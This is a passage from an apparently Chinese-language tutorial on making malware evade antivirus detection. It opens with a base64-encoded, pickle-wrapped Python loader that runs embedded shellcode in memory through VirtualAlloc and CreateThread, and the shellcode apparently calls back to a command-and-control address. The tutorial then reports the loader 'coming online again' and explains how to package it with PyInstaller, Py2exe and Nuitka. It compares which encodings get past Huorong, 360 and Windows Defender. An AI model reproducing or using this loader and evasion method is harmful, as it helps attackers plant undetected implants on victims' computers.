QVFBQTZJdi8vLzh2UmsxNFVRQnVpQmFWYy8zVGppNnJrUXA3UHBZa1Nwa0x3a2RmNGVPRmIxTVNuTmxpcVpkV0ZiSmxLNzJicEtlc2lTQldIUnRRRVJMU2RIYVlKd3NXN3EzS1IyTmhYanRSUlZsUktVYnZBRlZ6WlhJdFFXZGxiblE2SUUxdmVtbHNiR0V2TkM0d0lDaGpiMjF3WVhScFlteGxPeUJOVTBsRklEZ3VNRHNnVjJsdVpHOTNjeUJPVkNBMkxqQTdJRlJ5YVdSbGJuUXZOQzR3S1EwS0FHMTI4ZEF4UmtrbWVUTFYzU3FKNXNKVTY2MnpUWlMwRjhqU3ArTEVpNVNQYzJHQlhxc2lDV3ZPVjBKd3lOQ3AzaTB2Q1RPa2NNdHdyVG1kY05yRU5hOHplSGN6QzlRWnNkd29Fa1JTNVgrZ0k4ZmJMa2FVakg2WUo5U3I0SW96VGpkbjBNQ1RNUXBDbkUyNVdYVmN3NFNKdjR1V0dQSGdXSmZ0TS82SjlKSm1RRlZiN1hwU1hlL25iN3NZSnhQNVFWNzNTZ3IxblFSdlNjRmZiNlIvRFhuaGJhVlM1Qy9Jbjd5V1N2TW0zMjcrbGZmeWlXUlF5MXFpK1Z3V204M0xjeEc1VHFaZmJCOHlocWZpZzR5M0lMaCtIdXR3MjFaVnA5QVdOYlNwa1F4UzdRQm84TFdpVnYvVmFrQm9BQkFBQUdnQUFFQUFWMmhZcEZQbC85V1R1UUFBQUFBQjJWRlRpZWRYYUFBZ0FBQlRWbWdTbG9uaS85V0Z3SFRHaXdjQnc0WEFkZVZZdytpcC9mLy9NVGt5TGpFMk9DNHlNeTR4TWpnQUFBR0dvQT09JwpzaGVsbGNvZGUgPSBiYXNlNjQuYjY0ZGVjb2RlKGVuY29kZV9zaGVsbGNvZGUpCnJ3eHBhZ2UgPSBjdHlwZXMud2luZGxsLmtlcm5lbDMyLlZpcnR1YWxBbGxvYygwLCBsZW4oc2hlbGxjb2RlKSwgMHgxMDAwLCAweDQwKQpjdHlwZXMud2luZGxsLmtlcm5lbDMyLlJ0bE1vdmVNZW1vcnkocnd4cGFnZSwgY3R5cGVzLmNyZWF0ZV9zdHJpbmdfYnVmZmVyKHNoZWxsY29kZSksIGxlbihzaGVsbGNvZGUpKQpoYW5kbGUgPSBjdHlwZXMud2luZGxsLmtlcm5lbDMyLkNyZWF0ZVRocmVhZCgwLCAwLCByd3hwYWdlLCAwLCAwLCAwKQpjdHlwZXMud2luZGxsLmtlcm5lbDMyLldhaXRGb3JTaW5nbGVPYmplY3QoaGFuZGxlLCAtMSkKlIWUUpQu' pickle.loads(base64.b64decode(shellcode))
再次成功上线
打包器
如果只是py文件的话,我们在实战中可能遇到没有python环境,所以需要打包python解析器
Pyinstaller&Py2exe&Nuitka
不同的打包器免杀性能不一样
Pyinstaller
一般是python只带的可以到python环境找一下
如果没有可以win+R然后运行以下代码
pip install pyinstaller -i https://pypi.tuna.tsinghua.edu.cn/simple/ pip install pyinstaller(这个是看安装在哪了)
常用打包参数(示例)
常用参数 含义 -i 或 -icon 生成icon -F 创建一个绑定的可执行文件 -w 使用窗口,无控制台 -C 使用控制台,无窗口 -D 创建一个包含可执行文件的单文件夹包(默认情况下) -n 文件名
接下来对上面说的三种加密进行打包,看看免杀情况
在pyinstaller.exe文件目录下运行
pyinstaller.exe -F 1.py
可执行文件在该目录下的dist文件里,直接运行
先试了base64编码,但是直接火绒、360、Defender杀了
换aes试试,还是火绒/360报毒,但是defender过了
最后看看反序列化可以绕过火绒/360
Py2exe
首先安装Py2exe
pip install py2exe
然后再有setup.py的目录下运行
setup.py文件
主要改这俩个位置(py的文件名)
然后再在setup.py目录下运行
python setup.py py2exe
先base64,可以过掉火绒,过不了defender/360
aes的可以过火绒/defender,过不了360
反序列化可以过掉火绒/defender,过不了360
Nuitka
安装比较麻烦
先安装gcc
然后再输入cmd
pip install nuitka
运行脚本
nuitka 1.py
先base64,可以过掉火绒,过不了defender/360
aes的可以过火绒/defender/360
反序列化可以过掉火绒/defender/360